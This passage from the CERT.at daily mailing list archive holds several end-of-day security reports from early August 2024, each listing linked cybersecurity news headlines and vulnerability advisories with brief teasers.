for Data is vulnerable to exposing sensitive information due to Masterminds GoUtils ( CVE-2021-4238 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164234 ∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Node.js semver ( CVE-2022-25883 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164266 ∗∗∗ IBM Cloud Pak for Data is vulnerable to regular expression denial of service due to Rack ( CVE-2023-27539 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164269 ∗∗∗ This Power System update is being released to address CVE-2024-41660 ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7163146 ∗∗∗ IBM Aspera Shares improved security for user session handling (CVE-2023-38018) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164325 ∗∗∗ The IBM Engineering Lifecycle Engineering product using the -Xgc:concurrentScavenge option on IBM Z is vulnerable to Buffer overflow in GC ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164658 ∗∗∗ The IBM Engineering Lifecycle Engineering product using IBM WebSphere Application Server is vulnerable to cross-site scripting (CVE-2024-35153) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164651 ∗∗∗ The IBM Engineering Lifecycle Engineering product using IBM WebSphere Application Server is vulnerable to remote code execution (CVE-2024-35154) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164649 ∗∗∗ The IBM Engineering Lifecycle Engineering product using IBM WebSphere Application Server is vulnerable to identity spoofing (CVE-2024-37532) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164653 ∗∗∗ IBM Sterling Connect:Direct Web Service is affected by Java JWT vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164709 ∗∗∗ There is a vulnerability in commons-compress-1.21.jar used by IBM Maximo Manage application in IBM Maximo Application Suite (CVE-2024-25710, CVE-2024-26308) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164810 ∗∗∗ There is a vulnerability in commons-compress-1.21.jar used by IBM Maximo Asset Management application (CVE-2024-25710, CVE-2024-26308) ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164809 ∗∗∗ Maximo Application Suite - IBM WebSphere Application Server Liberty is vulnerable to CVE-2024-27268 used in IBM Maximo Application Suite - Monitor Component ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164814 ∗∗∗ Maximo Application Suite - IBM WebSphere Application Server Liberty is vulnerable to CVE-2024-22354 used in IBM Maximo Application Suite - Monitor Component ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164813 ∗∗∗ Maximo Application Suite - IBM WebSphere Application Server Liberty is vulnerable to CVE-2023-51775 a denial of service due to jose4j ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164812 ∗∗∗ Maximo Application Suite - IBM WebSphere Application Server Liberty is vulnerable to multiple CVEs used in IBM Maximo Application Suite - Monitor Component ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7164811 ∗∗∗ Multiple Vulnerabilities in XCC affect IBM Cloud Pak System ∗∗∗ --------------------------------------------- https://www.ibm.com/support/pages/node/7147906 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 08.08.2024
by Daily end-of-shift report 08 Aug '24

08 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 07-08-2024 18:00 − Donnerstag 08-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Kein Patch in Sicht: Phishing-Warnung in Outlook lässt sich per Mail ausblenden ∗∗∗ --------------------------------------------- Obendrein kann eine Phishing-Mail in Outlook auch vortäuschen, dass sie verschlüsselt oder signiert ist. Für Microsoft hat das Thema derzeit keine Priorität. --------------------------------------------- https://www.golem.de/news/kein-patch-in-sicht-phishing-warnung-in-outlook-l… ∗∗∗ Samsung boosts bug bounty to a cool million for cracks of the Knox Vault subsystem ∗∗∗ --------------------------------------------- Good luck, crackers: Its an isolated processor and storage enclave, and top dollar only comes from a remote attack Samsung has dangled its first $1 million bug bounty for anyone who successfully compromises Knox Vault – the isolated subsystem the Korean giant bakes into its smartphones to store info like credentials and run authentication routines. --------------------------------------------- https://www.theregister.com/2024/08/08/samsung_microsoft_big_bug_bounty/ ∗∗∗ Using 1Password on Mac? Patch up if you don’t want your Vaults raided ∗∗∗ --------------------------------------------- Hundreds of thousands of users potentially vulnerable Password manager 1Password is warning that all Mac users running versions before 8.10.36 are vulnerable to a bug that allows attackers to steal vault items. --------------------------------------------- https://www.theregister.com/2024/08/08/using_1password_on_mac_patch/ ∗∗∗ A Flaw in Windows Update Opens the Door to Zombie Exploits ∗∗∗ --------------------------------------------- A researcher found a vulnerability that would let hackers strategically downgrade a target’s Windows version to reexpose patched vulnerabilities. Microsoft is working on fixes for the issue. --------------------------------------------- https://www.wired.com/story/windows-update-downdate-exploit/ ∗∗∗ Vulnerabilities Exposed Widely Used Solar Power Systems to Hacking, Disruption ∗∗∗ --------------------------------------------- Vulnerabilities found in solar power systems could have been exploited by hackers to cause disruption and possibly blackouts. --------------------------------------------- https://www.securityweek.com/vulnerabilities-exposed-widely-used-solar-powe… ∗∗∗ Royal Ransomware Actors Rebrand as “BlackSuit,” FBI and CISA Release Update to Advisory ∗∗∗ --------------------------------------------- Today, CISA—in partnership with the Federal Bureau of Investigation (FBI)—released an update to joint Cybersecurity Advisory #StopRansomware: Royal Ransomware, #StopRansomware: BlackSuit (Royal) Ransomware. The updated advisory provides network .. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/08/07/royal-ransomware-actors-… ∗∗∗ US offers $10 million for info on Iranian leaders behind CyberAv3ngers water utility attacks ∗∗∗ --------------------------------------------- The U.S. State Department identified at least six Iranian government hackers allegedly responsible for a string of attacks on U.S. water utilities last fall and offered a large reward for information on their whereabouts. --------------------------------------------- https://therecord.media/us-offers-reward-for-info-on-iranian-hackers-water-… ∗∗∗ BOTNET 7777: ARE YOU BETTING ON A COMPROMISED ROUTER? ∗∗∗ --------------------------------------------- A “7777 botnet” was first referenced in public reporting in October 2023 by Gi7w0rm. At the time, it was described as a botnet with approximately 10,000 nodes, observed primarily in brute-force attacks against Microsoft Azure instances. These attacks .. --------------------------------------------- https://www.team-cymru.com/post/botnet-7777-are-you-betting-on-a-compromise… ∗∗∗ Go deeper: Linux runtime visibility meets Wireshark ∗∗∗ --------------------------------------------- Aqua Tracee is an open source runtime security and forensics tool for Linux, built to address common Linux security issues. Tracee’s main use case is to be installed in a production environment and continuously monitor system activity and detect suspicious behavior. Some alternative use cases which Tracee can be used for are dynamic malware analysis, system tracing, .. --------------------------------------------- https://blog.aquasec.com/go-deeper-linux-runtime-visibility-meets-wireshark ∗∗∗ PureHVNC Deployed via Python Multi-stage Loader ∗∗∗ --------------------------------------------- FortiGuard Lab reveals a malware "PureHVNC", sold on the cybercrime forum, is spreading through a phishing campaign targeting employees via a python multi-stage loader --------------------------------------------- https://www.fortinet.com/blog/threat-research/purehvnc-deployed-via-python-… ∗∗∗ Cisco: Angreifer können Befehle auf IP-Telefonen ausführen, Update kommt nicht ∗∗∗ --------------------------------------------- Für kritische Lücken in Cisco-IP-Telefonen wird es keine Updates geben. Für eine jüngst gemeldete Lücke ist ein Proof-of-Concept-Exploit aufgetaucht. --------------------------------------------- https://heise.de/-9827988 ===================== = Vulnerabilities = ===================== ∗∗∗ DSA-5743-1 roundcube - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00154.html ∗∗∗ Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerabilities ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco Small Business SPA300 Series and SPA500 Series IP Phones Web UI Vulnerabilities ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.08.2024
by Daily end-of-shift report 07 Aug '24

07 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 06-08-2024 18:00 − Mittwoch 07-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Schweiz: Kuh stirbt nach Cyberangriff auf Melkroboter ∗∗∗ --------------------------------------------- Die Angreifer forderten ein Lösegeld. Da der Landwirt nicht zahlen wollte, ist ihm der Zugang zu wichtigen Informationen über seine Kühe verwehrt geblieben. --------------------------------------------- https://www.golem.de/news/schweiz-kuh-stirbt-nach-cyberangriff-auf-melkrobo… ∗∗∗ New Linux Kernel Exploit Technique SLUBStick Discovered by Researchers ∗∗∗ --------------------------------------------- Cybersecurity researchers have shed light on a novel Linux kernel exploitation technique dubbed SLUBStick that could be exploited to elevate a limited heap vulnerability to an arbitrary memory read-and-write primitive."Initially, it exploits .. --------------------------------------------- https://thehackernews.com/2024/08/new-linux-kernel-exploit-technique.html ∗∗∗ Roundcube Webmail Flaws Allow Hackers to Steal Emails and Passwords ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed details of security flaws in the Roundcube webmail software that could be exploited to execute malicious JavaScript in a victims web browser and steal sensitive information from their account under specific .. --------------------------------------------- https://thehackernews.com/2024/08/roundcube-webmail-flaws-allow-hackers.html ∗∗∗ CrowdStrike hires outside security outfits to review troubled Falcon code ∗∗∗ --------------------------------------------- And reveals the small mistake that bricked 8.5M Windows boxes CrowdStrike has hired two outside security firms to review its threat-detection suite Falcon that sparked a global IT outage last month - though it may not have an awful lot .. --------------------------------------------- https://www.theregister.com/2024/08/07/crowdstrike_full_incident_root_cause… ∗∗∗ Police take just 2 days to recover $40M stolen in business email scam ∗∗∗ --------------------------------------------- Timor-Leste is a known cybercrime hotspot Two days is all it took for Interpol to recover more than $40 million worth of stolen funds in a recent business email compromise (BEC) heist, the international cop shop said this week. --------------------------------------------- https://www.theregister.com/2024/08/07/police_take_just_two_days/ ∗∗∗ Small CSS tweaks can help nasty emails slip through Outlooks anti-phishing net ∗∗∗ --------------------------------------------- A simple HTML change and the warning is gone! Researchers say cybercriminals can have fun bypassing one of Microsofts anti-phishing measures in Outlook with some simple CSS tweaks. --------------------------------------------- https://www.theregister.com/2024/08/07/small_css_tweaks_can_help/ ∗∗∗ BloodHound Operator — Dog Whispering Reloaded ∗∗∗ --------------------------------------------- Back in the BloodHound “Legacy” days, I wrote some PowerShell tooling to make my life easy and automate various tasks around BloodHound. When the new BloodHound came out, most of these tools .. --------------------------------------------- https://posts.specterops.io/bloodhound-operator-dog-whispering-reloaded-156… ∗∗∗ CISA Releases Secure by Demand Guidance ∗∗∗ --------------------------------------------- Today, CISA and the Federal Bureau of Investigation (FBI) have released Secure by Demand Guide: How Software Customers Can Drive a Secure Technology Ecosystem to help organizations drive a secure technology ecosystem by ensuring their software manufacturers prioritize secure technology from the start.An organization’s acquisition staff often has a general .. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/08/06/cisa-releases-secure-dem… ∗∗∗ Achtung: Microsofts UEFI Zertifikat läuft am 19. Okt. 2026 aus – Secure Boot betroffen ∗∗∗ --------------------------------------------- [English]Ich stelle mal ein Thema hier im Blog ein, was noch "ein paar Tage Zeit hat", aber arg unangenehme Folgen haben könnte. Im Herbst 2026 läuft ein Zertifikat in Windows aus, welches im UEFI dafür sorgt, dass der .. --------------------------------------------- https://www.borncity.com/blog/2024/08/07/achtung-microsofts-uefi-zertifikat… ∗∗∗ Looking back at the ballot – securing the general election ∗∗∗ --------------------------------------------- NCSC CEO Felicity Oswald shares reflections on keeping the 2024 General Election safe. --------------------------------------------- https://www.ncsc.gov.uk/blog-post/looking-back-at-the-ballot-securing-the-g… ∗∗∗ The Risks of Parked Domains ∗∗∗ --------------------------------------------- Many organizations view parked domains as dormant, low-risk, and not worth the investment in robust security measures. This is a misconception. Heres why. --------------------------------------------- https://www.bitsight.com/blog/risks-parked-domains ===================== = Vulnerabilities = ===================== ∗∗∗ DSA-5739-1 wpa - security update ∗∗∗ --------------------------------------------- Rory McNamara reported a local privilege escalation in wpasupplicant: A user able to escalate to the netdev group can load arbitrary shared object files in the context of the wpa_supplicant process running as root. --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00151.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.08.2024
by Daily end-of-shift report 06 Aug '24

06 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Montag 05-08-2024 18:00 − Dienstag 06-08-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Mac and Windows users infected by software updates delivered over hacked ISP ∗∗∗ --------------------------------------------- DNS poisoning attack worked even when targets used DNS from Google and Cloudflare. --------------------------------------------- https://arstechnica.com/?p=2041175 ∗∗∗ Microsoft Bounty Program Year in Review: $16.6M in Rewards ∗∗∗ --------------------------------------------- We are excited to announce that this year the Microsoft Bounty Program has awarded $16.6M in bounty awards to 343 security researchers from 55 countries, securing Microsoft customers in partnership with the Microsoft Security Response Center (MSRC). Each year we identify over a thousand potential security issues together, safeguarding our customers from possible threats through the Microsoft Bounty Program. --------------------------------------------- https://msrc.microsoft.com/blog/2024/08/microsoft-bounty-program-year-in-re… ∗∗∗ A Survey of Scans for GeoServer Vulnerabilities ∗∗∗ --------------------------------------------- A little bit over a year ago, I wrote about scans for GeoServer. GeoServer is a platform to process geographic data. It makes it easy to share geospatial data in various common standard formats. Recently, new vulnerabilities were discovered in GeoServer, prompting me to look again at what our honeypots pick up. --------------------------------------------- https://isc.sans.edu/diary/A+Survey+of+Scans+for+GeoServer+Vulnerabilities/… ∗∗∗ MDM vendor Mobile Guardian attacked, leading to remote wiping of 13,000 devices ∗∗∗ --------------------------------------------- Singapore Ministry of Education orders software removed after string of snafus UK-based mobile device management vendor Mobile Guardian has admitted that on August 4 it suffered a security incident that involved unauthorized access to iOS and ChromeOS devices managed by its tools, which are currently unavailable. In Singapore, the incident resulted in .. --------------------------------------------- https://www.theregister.com/2024/08/06/mobile_guardian_mdm_attack/ ∗∗∗ Bad apps bypass Windows security alerts for six years using newly unveiled trick ∗∗∗ --------------------------------------------- Windows SmartScreen and Smart App Control both have weaknesses of which to be wary Elastic Security Labs has lifted the lid on a slew of methods available to attackers who want to run malicious apps without triggering Windows security .. --------------------------------------------- https://www.theregister.com/2024/08/06/bad_apps_bypass_windows_security/ ∗∗∗ Olympia: Cyberkriminelle fordern nach Attacke auf Museen in Frankreich Lösegeld ∗∗∗ --------------------------------------------- Mehr als 40 Institutionen sind betroffen, darunter der Olympia-Austragungsort Grand Palais. Kriminelle haben das System für die Zentralisierung von Finanzdaten angegriffen --------------------------------------------- https://www.derstandard.at/story/3000000231309/olympia-cyber-attacke-auf-mu… ∗∗∗ IoT firmware emulation and device fingerprinting challenges ∗∗∗ --------------------------------------------- Gathering information on a device could be tricky if you don’t have direct access to exposed services like SNMP, HTTP, FTP, or any other ports or protocols which could provide relevant information on the asset like the .. --------------------------------------------- https://medium.com/tenable-techblog/iot-firmware-emulation-and-device-finge… ∗∗∗ Rapid7’s Ransomware Radar Report Shows Threat Actors are Evolving …Fast. ∗∗∗ --------------------------------------------- The Ransomware Radar Report offers some startling insights into who ransomware threat actors are and how they’ve been operating in the first half of 2024. --------------------------------------------- https://www.rapid7.com/blog/post/2024/08/06/rapid7s-ransomware-radar-report… ∗∗∗ LKA Niedersachsen warnt vor Phishing mit QR-Codes per Briefpost ∗∗∗ --------------------------------------------- Per Briefpost suchen Betrüger Opfer, die einen QR-Code scannen und auf den dadurch geöffneten Phishing-Link hereinfallen, warnt das LKA Niedersachsen. --------------------------------------------- https://heise.de/-9825879 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (libreoffice), Gentoo (containerd and firefox), Red Hat (httpd), SUSE (ca-certificates-mozilla, ksh, openssl-3-livepatches, podman, python-Twisted, and skopeo), and Ubuntu (imagemagick). --------------------------------------------- https://lwn.net/Articles/984598/ ∗∗∗ DSA-5737-1 libreoffice - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00149.html ∗∗∗ DSA-5736-1 openjdk-11 - security update ∗∗∗ --------------------------------------------- https://lists.debian.org/debian-security-announce/2024/msg00148.html ∗∗∗ ZDI-24-1099: Apache OFBiz resolveURI Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1099/ ∗∗∗ Security Vulnerabilities fixed in Firefox 129 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2024-33/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 05.08.2024
by Daily end-of-shift report 05 Aug '24

05 Aug '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 02-08-2024 18:00 − Montag 05-08-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms ∗∗∗ --------------------------------------------- StormBamboo successfully compromised an internet service provider (ISP) in order to poison DNS responses for target organizations. Insecure software update mechanisms were targeted to surreptitiously install malware on victim machines running macOS and Windows. --------------------------------------------- https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abu… ∗∗∗ Google Chrome warns uBlock Origin may soon be disabled ∗∗∗ --------------------------------------------- Google Chrome is now encouraging uBlock Origin users who have updated to the latest version to switch to other ad blockers before Manifest v2 extensions are disabled. --------------------------------------------- https://www.bleepingcomputer.com/news/google/google-chrome-warns-ublock-ori… ∗∗∗ Security Tips for Modern Web Administrators ∗∗∗ --------------------------------------------- By understanding and implementing key security practices, you can significantly reduce the risk of attacks and ensure a safe experience for your users. Let’s break down some essential tips and strategies to enhance your website’s security. --------------------------------------------- https://blog.sucuri.net/2024/08/security-tips-for-modern-web-administrators… ∗∗∗ Google gamed into advertising a malicious version of Authenticator ∗∗∗ --------------------------------------------- Scammers have been using Google's own ad system to fool people into downloading a borked copy of the Chocolate Factory's Authenticator software. A team at security shop Malwarebytes spotted the adverts, which appear to come from a Google approved domain – and from a verified user – earlier this week. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/08/05/security_in_… ∗∗∗ New SLUBStick Attack Makes Linux Kernel Vulnerabilities More Dangerous ∗∗∗ --------------------------------------------- A team of researchers from the Graz University of Technology in Austria has published a paper on SLUBStick, a new Linux kernel exploitation technique that can make heap vulnerabilities more dangerous. --------------------------------------------- https://www.securityweek.com/new-slubstick-attack-makes-linux-kernel-vulner… ∗∗∗ Homebrew-Audit enthüllt Sicherheitslücken – die meisten hat das Team geschlossen ∗∗∗ --------------------------------------------- Ein umfangreiches Security-Audit hat Schwachstellen im Code und den CI/CD-Prozessen des Paketmanagers Homebrew gefunden. Viele, aber nicht alle, sind gefixt. --------------------------------------------- https://heise.de/-9822824 ===================== = Vulnerabilities = ===================== ∗∗∗ Kritische Sicherheitslücke bedroht Unternehmenssoftware Apache OFBiz ∗∗∗ --------------------------------------------- Angreifer können Systeme mit Apache OFBiz attackieren und eigenen Code ausführen. Eine dagegen abgesicherte Version steht zum Download bereit. [..] Derzeit gibt es kaum Informationen zur Lücke (CVE-2024-38856). Aus einem Seclists-Beitrag geht hervor, dass es zu Fehlern bei der Authentifizierung kommen kann, sodass Angreifer eigenen Code ausführen können. --------------------------------------------- https://heise.de/-9824150 ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (openjdk-11), Fedora (bind, bind-dyndb-ldap, chromium, ffmpeg, hostapd, trafficserver, and wpa_supplicant), and Ubuntu (curl and linux-oem-6.5). --------------------------------------------- https://lwn.net/Articles/984552/ ∗∗∗ Pimax Play and PiTool accept WebSocket connections from unintended endpoints ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN50850706/ ∗∗∗ Helmholz: Multiple products are vulnerable to regreSSHion ∗∗∗ --------------------------------------------- https://certvde.com/de/advisories/VDE-2024-044/ ∗∗∗ Red Lion Europe: Multiple products are vulnerable to regreSSHion ∗∗∗ --------------------------------------------- https://certvde.com/de/advisories/VDE-2024-042/ ∗∗∗ RaspAP Security Update Advisory (CVE-2024-41637) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/82193/ ∗∗∗ OpenAM Security Update Advisory (CVE-2024-41667) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/82194/ ∗∗∗ GStreamer Product Security Update Advisory (CVE-2024-40897) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/82196/ ∗∗∗ Roundcube: Security updates 1.6.8 and 1.5.8 released ∗∗∗ --------------------------------------------- https://roundcube.net/news/2024/08/04/security-updates-1.6.8-and-1.5.8 ∗∗∗ F5: K000140505: Apache HTTPD vulnerability CVE-2024-38473 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000140505 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0